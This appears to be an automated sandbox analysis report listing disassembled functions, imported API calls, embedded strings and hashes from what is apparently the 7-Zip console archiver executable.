free.MSVCRT ref: 00B72D18
free.MSVCRT ref: 00B72D29
free.MSVCRT ref: 00B72D37
free.MSVCRT ref: 00B72D42
free.MSVCRT ref: 00B72E6E
free.MSVCRT ref: 00B72E79
free.MSVCRT ref: 00B72EA6
free.MSVCRT ref: 00B72EB1
free.MSVCRT ref: 00B72F03
free.MSVCRT ref: 00B72F0E
free.MSVCRT ref: 00B72F97
free.MSVCRT ref: 00B72F9F
free.MSVCRT ref: 00B72FAD
free.MSVCRT ref: 00B72FC2
free.MSVCRT ref: 00B72FCD
free.MSVCRT ref: 00B7300C
free.MSVCRT ref: 00B73017
free.MSVCRT ref: 00B73027
free.MSVCRT ref: 00B73032
free.MSVCRT ref: 00B73042
free.MSVCRT ref: 00B7304D
free.MSVCRT ref: 00B7305E
free.MSVCRT ref: 00B731EB
free.MSVCRT ref: 00B731F6
free.MSVCRT ref: 00B7321C
free.MSVCRT ref: 00B73227

Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F

free.MSVCRT ref: 00B7325A
free.MSVCRT ref: 00B73262

Part of subcall function 00B53314: memmove.MSVCRT ref: 00B53339

free.MSVCRT ref: 00B73270
free.MSVCRT ref: 00B7329E
free.MSVCRT ref: 00B732A6
free.MSVCRT ref: 00B732D9
free.MSVCRT ref: 00B732E1
free.MSVCRT ref: 00B732F1
free.MSVCRT ref: 00B733E5
free.MSVCRT ref: 00B73445
free.MSVCRT ref: 00B73455
free.MSVCRT ref: 00B73464
free.MSVCRT ref: 00B73472
free.MSVCRT ref: 00B73490
free.MSVCRT ref: 00B7349E
free.MSVCRT ref: 00B734BC
free.MSVCRT ref: 00B734CA

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ExceptionThrowmallocmemmove
String ID:
API String ID: 3352498445-0
Opcode ID: a977c30e9b6c0c77fa91ba2bef927ebd8b73980ec7f1edacc1f00c6c713dab27
Instruction ID: deaa2c6f7cd83d1f097c6134917ac1ad4db4b76ec5424144cde19e35642216bb
Opcode Fuzzy Hash: a977c30e9b6c0c77fa91ba2bef927ebd8b73980ec7f1edacc1f00c6c713dab27
Instruction Fuzzy Hash: 75824032319A8085CA30EF25E4913AEB3E0F786B94F5481A6DF9D57B59DF78C949CB00

Function 00B747AC Relevance: 86.1, APIs: 56, Strings: 1, Instructions: 647
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B53314: memmove.MSVCRT ref: 00B53339

free.MSVCRT ref: 00B748E0
free.MSVCRT ref: 00B748EE
free.MSVCRT ref: 00B749B8
free.MSVCRT ref: 00B749F1
free.MSVCRT ref: 00B749FF
free.MSVCRT ref: 00B74A0D
free.MSVCRT ref: 00B74A18
free.MSVCRT ref: 00B74A47
free.MSVCRT ref: 00B74A4F
free.MSVCRT ref: 00B74A5D
free.MSVCRT ref: 00B75052

Part of subcall function 00B53404: free.MSVCRT ref: 00B53431
Part of subcall function 00B53404: memmove.MSVCRT ref: 00B5344C

free.MSVCRT ref: 00B74C20
free.MSVCRT ref: 00B74C2E
free.MSVCRT ref: 00B74C3C
free.MSVCRT ref: 00B74C47
free.MSVCRT ref: 00B74C79
free.MSVCRT ref: 00B74C81
free.MSVCRT ref: 00B74C90
free.MSVCRT ref: 00B74CB3
free.MSVCRT ref: 00B74CC1
free.MSVCRT ref: 00B74CCF
free.MSVCRT ref: 00B74CDA
free.MSVCRT ref: 00B74D0C
free.MSVCRT ref: 00B74D14
free.MSVCRT ref: 00B74D23
free.MSVCRT ref: 00B74D76
free.MSVCRT ref: 00B74D84
free.MSVCRT ref: 00B74D92
free.MSVCRT ref: 00B74D9D
free.MSVCRT ref: 00B74DCC
free.MSVCRT ref: 00B74DD4
free.MSVCRT ref: 00B74DE3
GetLastError.KERNEL32 ref: 00B74E70
free.MSVCRT ref: 00B74EB2
free.MSVCRT ref: 00B74EC0
free.MSVCRT ref: 00B74ECE
free.MSVCRT ref: 00B74ED9
free.MSVCRT ref: 00B74F08
free.MSVCRT ref: 00B74F10
free.MSVCRT ref: 00B74F1F
free.MSVCRT ref: 00B74FD5
free.MSVCRT ref: 00B74FE3
free.MSVCRT ref: 00B74FF1
free.MSVCRT ref: 00B74FFC
free.MSVCRT ref: 00B7502B
free.MSVCRT ref: 00B75033
free.MSVCRT ref: 00B75042
_CxxThrowException.MSVCRT ref: 00B7510C
free.MSVCRT ref: 00B751B9
free.MSVCRT ref: 00B751C7
free.MSVCRT ref: 00B751D5
free.MSVCRT ref: 00B751E0
free.MSVCRT ref: 00B7520F
free.MSVCRT ref: 00B75217
free.MSVCRT ref: 00B75226
free.MSVCRT ref: 00B75234

Strings

Can not create output directory: , xrefs: 00B74E83

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove$ErrorExceptionLastThrow
String ID: Can not create output directory:
API String ID: 4159955631-3123869724
Opcode ID: 413c8c4aa713bf56841916301f3c023350d4de2d962ce64e83949b71d0a2ade2
Instruction ID: 873869b7459b605c95cbc721151946459947a51af039a7b0cceaffc4150249aa
Opcode Fuzzy Hash: 413c8c4aa713bf56841916301f3c023350d4de2d962ce64e83949b71d0a2ade2
Instruction Fuzzy Hash: F3426023316AC096CA30EB25E4903AEB3A1F7C6B81F545192DF9D57B19DF78C959CB00

Function 00B75458 Relevance: 74.2, APIs: 47, Strings: 2, Instructions: 702
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 00B7558E
_CxxThrowException.MSVCRT ref: 00B755C2
_CxxThrowException.MSVCRT ref: 00B755E6
memset.MSVCRT ref: 00B7561F
free.MSVCRT ref: 00B756F2
free.MSVCRT ref: 00B75F84

Strings

can't decompress folder, xrefs: 00B755C8
there is no such archive, xrefs: 00B755A4, 00B75EF9

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ExceptionThrow$memset
String ID: can't decompress folder$there is no such archive
API String ID: 4182836161-2069749860
Opcode ID: ce4216a456ecfb562eed58e09bd1e089566f6c8440c9455ca6f18eb35ebed729
Instruction ID: f365a8b7a3d68475c53e8fb17772a750f15770a2d128ea2c3a37c3ddd68f509b
Opcode Fuzzy Hash: ce4216a456ecfb562eed58e09bd1e089566f6c8440c9455ca6f18eb35ebed729
Instruction Fuzzy Hash: 54522C33209AC186CA30DB25E4847AEB7A4F786B91F4451A2DFAD63B25DF78C855CB40

Function 00B7F13E Relevance: 59.4, APIs: 47, Instructions: 683COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eadb98abd82e25e36940fb318a204b117e1ed3c7f246080696e62d728c723bb
Instruction ID: 025112911ec3d6e52967839db1db13d7c8491c720c0babaa86d71c96edbf169d
Opcode Fuzzy Hash: 5eadb98abd82e25e36940fb318a204b117e1ed3c7f246080696e62d728c723bb
Instruction Fuzzy Hash: C4426F3720AA8486CB24EF25D0907AF77E5F386B88F5550A6EB5E57B25CF38C449CB04

Function 00B60DCC Relevance: 51.4, APIs: 17, Strings: 12, Instructions: 652COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 00B60E15
free.MSVCRT ref: 00B60E4E
_CxxThrowException.MSVCRT ref: 00B60E7A
free.MSVCRT ref: 00B60EBD
wcscmp.MSVCRT ref: 00B60F33
_CxxThrowException.MSVCRT ref: 00B60F9B
_CxxThrowException.MSVCRT ref: 00B6112A
_CxxThrowException.MSVCRT ref: 00B613AC
_CxxThrowException.MSVCRT ref: 00B614D3
_CxxThrowException.MSVCRT ref: 00B615E3
_CxxThrowException.MSVCRT ref: 00B61730
_CxxThrowException.MSVCRT ref: 00B61761
_CxxThrowException.MSVCRT ref: 00B617A2
_CxxThrowException.MSVCRT ref: 00B61801
_CxxThrowException.MSVCRT ref: 00B6186B
_CxxThrowException.MSVCRT ref: 00B61171

Part of subcall function 00B563D0: free.MSVCRT ref: 00B56440
Part of subcall function 00B563D0: free.MSVCRT ref: 00B56448

_CxxThrowException.MSVCRT ref: 00B618F2

Strings

Only one archive can be created with rename command, xrefs: 00B617E1
Unsupported -spf:, xrefs: 00B60F7E
I won't write compressed data to a terminal, xrefs: 00B61741
Cannot find archive name, xrefs: 00B6110A
Unsupported command:, xrefs: 00B60E57
-ai switch is not supported for this command, xrefs: 00B615C3
Archive name cannot by empty, xrefs: 00B61151
Incorrect Number of benmchmark iterations, xrefs: 00B61847
Cannot use absolute pathnames for this command, xrefs: 00B6138C
stdout mode and email mode cannot be combined, xrefs: 00B61710
I won't write data and program's messages to same stream, xrefs: 00B614B3, 00B61782
The command must be specified, xrefs: 00B60DF5

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ExceptionThrow$free$wcscmp
String ID: -ai switch is not supported for this command$Archive name cannot by empty$Cannot find archive name$Cannot use absolute pathnames for this command$I won't write compressed data to a terminal$I won't write data and program's messages to same stream$Incorrect Number of benmchmark iterations$Only one archive can be created with rename command$The command must be specified$Unsupported -spf:$Unsupported command:$stdout mode and email mode cannot be combined
API String ID: 1252877886-1892825451
Opcode ID: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
Instruction ID: d051200b10157a0ef9cc55ddbf3e70b6fb24280682e7b31b271e9e4576e86587
Opcode Fuzzy Hash: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
Instruction Fuzzy Hash: 5A52E3773086C1A7DB28DF39D1903AEBBA1F355784F888496DB9903B12DB79D5A8C700

Function 00B61D04 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00B61D12
CloseHandle.KERNEL32 ref: 00B61D25
OpenProcessToken.ADVAPI32 ref: 00B61D48
LookupPrivilegeValueW.ADVAPI32 ref: 00B61D70
AdjustTokenPrivileges.KERNELBASE ref: 00B61D93
CloseHandle.KERNEL32 ref: 00B61DA7
GetLastError.KERNEL32 ref: 00B61DB1
CloseHandle.KERNELBASE ref: 00B61DC6

Strings

SeSecurityPrivilege, xrefs: 00B61D57

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: CloseHandle$ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeSecurityPrivilege
API String ID: 1313864721-2333288578
Opcode ID: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
Instruction ID: 91103ad25b4fe7b58b1e271cf8c399666a31d3240d991accdf1593a517f51e3f
Opcode Fuzzy Hash: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
Instruction Fuzzy Hash: 5F115172205B45C2DA00DF16F95437DB3A6FBC4B95F984422EA8B82A64CF3CC459CB10

Function 00B5AC74 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00B5AC84
OpenProcessToken.ADVAPI32 ref: 00B5AC95
LookupPrivilegeValueW.ADVAPI32 ref: 00B5ACA9
AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,FFFFFFFF,?,00B5F928), ref: 00B5ACE0
GetLastError.KERNEL32(?,?,?,?,?,?,?,FFFFFFFF,?,00B5F928), ref: 00B5ACEA
CloseHandle.KERNELBASE ref: 00B5ACFA

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3398352648-0
Opcode ID: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
Instruction ID: 4d07eb11542d89aefcf9c89fd4b73fd9af684b5867474976ae59bae2d3ba56f4
Opcode Fuzzy Hash: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
Instruction Fuzzy Hash: 15014C6261468287DB108FA4F8847AA73A1F784B96F545136EB8A92A54CF3CC89DCB40

Function 00B57978 Relevance: 4.6, APIs: 3, Instructions: 70fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B5794C: FindClose.KERNELBASE ref: 00B5795E

FindFirstFileW.KERNELBASE ref: 00B579BA

Part of subcall function 00B5339C: free.MSVCRT ref: 00B533D7
Part of subcall function 00B5339C: memmove.MSVCRT(00000000,?,?,00000000,00B510A8), ref: 00B533F2

FindFirstFileW.KERNELBASE ref: 00B579FA
free.MSVCRT ref: 00B57A08

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: Find$FileFirstfree$Closememmove
String ID:
API String ID: 2921071498-0
Opcode ID: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
Instruction ID: e403e57fadb2e0fac44a55a84d83c96e1fe3f809f40a2dccb978655a6ba9cb61
Opcode Fuzzy Hash: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
Instruction Fuzzy Hash: 24210C37208A8096DB11DF24F45036D63A1F78A7B9F545391EEA9477D9DF38CA09C740

Function 00B64418 Relevance: 219.6, APIs: 132, Strings: 13, Instructions: 2096COMMON

Download Yara Rule

Strings

Can not delete output folder, xrefs: 00B65A0E
Can not set length for output file, xrefs: 00B663C0
\??\, xrefs: 00B6485F
Can not create file with auto name, xrefs: 00B65796, 00B65867
Internal error for symbolic link file, xrefs: 00B65EFB
Can not create hard link, xrefs: 00B65E04, 00B661B7
Can not seek to begin of file, xrefs: 00B6642F
Can not delete output file, xrefs: 00B65AD5
Can not open output file, xrefs: 00B662D7
Incorrect path, xrefs: 00B65D6E
Can not rename existing file, xrefs: 00B6592F
Dangerous link path was ignored, xrefs: 00B65CC1
Can not create symbolic link, xrefs: 00B65FAB

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID:
String ID: Can not create file with auto name$Can not create hard link$Can not create symbolic link$Can not delete output file$Can not delete output folder$Can not open output file$Can not rename existing file$Can not seek to begin of file$Can not set length for output file$Dangerous link path was ignored$Incorrect path$Internal error for symbolic link file$\??\
API String ID: 0-2438533581
Opcode ID: 619308cd5c84a58143f6d60b4711cd903356f34d35ac1546f55c71045c053aa2
Instruction ID: 009013fcf4016895c50e2add95d5654b64df3d986da652037c359de4394463bf
Opcode Fuzzy Hash: 619308cd5c84a58143f6d60b4711cd903356f34d35ac1546f55c71045c053aa2
Instruction Fuzzy Hash: CC035132249E8082CA35DB25E4907AFB7A1F786BC0F545192DB9E57B25DF7DC889CB00

Function 00B9950D Relevance: 116.2, APIs: 48, Strings: 18, Instructions: 748
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 00B997B9
free.MSVCRT ref: 00B997C1
free.MSVCRT ref: 00B997D3
free.MSVCRT ref: 00B997E0
free.MSVCRT ref: 00B997EE
free.MSVCRT ref: 00B99809
free.MSVCRT ref: 00B9996E
free.MSVCRT ref: 00B99976
free.MSVCRT ref: 00B99988
free.MSVCRT ref: 00B99995
free.MSVCRT ref: 00B999A3
free.MSVCRT ref: 00B999C0
free.MSVCRT ref: 00B999CD
fputs.MSVCRT ref: 00B99A02
fputs.MSVCRT ref: 00B99A12
_CxxThrowException.MSVCRT ref: 00B99A3A

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

_CxxThrowException.MSVCRT ref: 00B9A5E1
free.MSVCRT ref: 00B9A5EF
free.MSVCRT ref: 00B9A61C
free.MSVCRT ref: 00B9A62E
free.MSVCRT ref: 00B9A696
free.MSVCRT ref: 00B9A69E
free.MSVCRT ref: 00B9A6B0

Part of subcall function 00B53518: free.MSVCRT ref: 00B53551

Strings

Warnings: , xrefs: 00B9A0F0
7zCon.sfx, xrefs: 00B99543
Archives with Errors: , xrefs: 00B9A07A
ERROR: , xrefs: 00B999FB
OK archives: , xrefs: 00B9A008
Compressed: , xrefs: 00B9A2A3
Alternate Streams Size: , xrefs: 00B9A250
Files: , xrefs: 00B9A1F6
Archives with Warnings: , xrefs: 00B9A0AF
Open Errors: , xrefs: 00B9A138
Sub items Errors: , xrefs: 00B9A2FB
Archives: , xrefs: 00B99FE1
ERROR:, xrefs: 00B99F89
Folders: , xrefs: 00B9A1A8
Incorrect command line, xrefs: 00B99A0B
Alternate Streams: , xrefs: 00B9A228
Can't open as archive: , xrefs: 00B9A03F
Size: , xrefs: 00B9A278

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ExceptionThrowfputs$fputc
String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
API String ID: 1639683984-435538426
Opcode ID: 0bba5815698ffe19a5e1efa49293ddbd27b3fdb07db2a727c2502226ce748b33
Instruction ID: f98f1b2482a875a559a6be02195a5db61cb8f044223b7f8f47a411dc29423e1c
Opcode Fuzzy Hash: 0bba5815698ffe19a5e1efa49293ddbd27b3fdb07db2a727c2502226ce748b33
Instruction Fuzzy Hash: 9D72697230AAC195CE74EB25E8903EEB3E0F786B80F4441A6DA9D43B19DF38C559CB45

Function 00B99B5D Relevance: 84.5, APIs: 33, Strings: 15, Instructions: 507
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fputs.MSVCRT ref: 00B99B6B

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

free.MSVCRT ref: 00B99C12

Strings

Warnings: , xrefs: 00B9A0F0
Archives with Errors: , xrefs: 00B9A07A
OK archives: , xrefs: 00B9A008
Compressed: , xrefs: 00B9A2A3
Alternate Streams Size: , xrefs: 00B9A250
Scanning the drive for archives:, xrefs: 00B99B64
Files: , xrefs: 00B9A1F6
Archives with Warnings: , xrefs: 00B9A0AF
Open Errors: , xrefs: 00B9A138
Archives: , xrefs: 00B99FE1
ERROR:, xrefs: 00B99F89
Folders: , xrefs: 00B9A1A8
Alternate Streams: , xrefs: 00B9A228
Can't open as archive: , xrefs: 00B9A03F
Size: , xrefs: 00B9A278

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputcfputsfree
String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
API String ID: 2822829076-727241755
Opcode ID: 76881a621ad82756a4bf301af10dc41923f0376f2db4c6d33a7aae10c23e2ed1
Instruction ID: 128998d84da24ed3a875707b358db03065cc9d0f8fdc3ee7e8d933ad7237a070
Opcode Fuzzy Hash: 76881a621ad82756a4bf301af10dc41923f0376f2db4c6d33a7aae10c23e2ed1
Instruction Fuzzy Hash: 5D22293230AAC195DE34EB25E8913EEB3E0F786B80F4441A6DA9E43B19DF38C559C745

Function 00B7A180 Relevance: 47.6, APIs: 23, Strings: 4, Instructions: 342
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00B7A1BF
GetProcAddress.KERNEL32 ref: 00B7A1D2
GetProcAddress.KERNEL32 ref: 00B7A1F5
GetProcAddress.KERNEL32 ref: 00B7A21E

Strings

GetHandlerProperty, xrefs: 00B7A214
GetHandlerProperty2, xrefs: 00B7A1B5
GetIsArc, xrefs: 00B7A1C8
GetNumberOfFormats, xrefs: 00B7A1EB

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: AddressProc
String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
API String ID: 190572456-3984264347
Opcode ID: 73fef0eb24d6ff44d8697e840df78f3fac1608cd30a242a31fa2bdb042e46f71
Instruction ID: dbed1fab5b6ad21c6aa3cc4e92c5809d71cec653410b5398f9ed5ecb836607a4
Opcode Fuzzy Hash: 73fef0eb24d6ff44d8697e840df78f3fac1608cd30a242a31fa2bdb042e46f71
Instruction Fuzzy Hash: A4D1843231AAC086CA60EB21E89079EB3E4F7C6B80F4055A1EA9E57B19DF7CC545CB01

Function 00B570C8 Relevance: 40.7, APIs: 27, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B57D4C: GetFileAttributesW.KERNELBASE ref: 00B57D6E
Part of subcall function 00B57D4C: GetFileAttributesW.KERNEL32 ref: 00B57DA5
Part of subcall function 00B57D4C: free.MSVCRT ref: 00B57DB2

free.MSVCRT ref: 00B573F6

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: AttributesFilefree
String ID:
API String ID: 1936811914-0
Opcode ID: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
Instruction ID: 506d9e5543645c89238895f3a9227f7ecf053b182de704897ee48fac1e76780a
Opcode Fuzzy Hash: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
Instruction Fuzzy Hash: 4481822235D94182CA20EF21F45136E63E1FBC6796F4411E2EF8E93665DF29C94E8B40

Function 00B57EBC Relevance: 37.2, APIs: 18, Strings: 3, Instructions: 418
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 00B5812F
free.MSVCRT ref: 00B5816A
free.MSVCRT ref: 00B5817F
free.MSVCRT ref: 00B58232

Part of subcall function 00B5ABB0: GetModuleHandleW.KERNEL32 ref: 00B5ABD1
Part of subcall function 00B5ABB0: GetProcAddress.KERNEL32 ref: 00B5ABE1
Part of subcall function 00B5ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 00B5AC32

SetLastError.KERNEL32 ref: 00B5818F
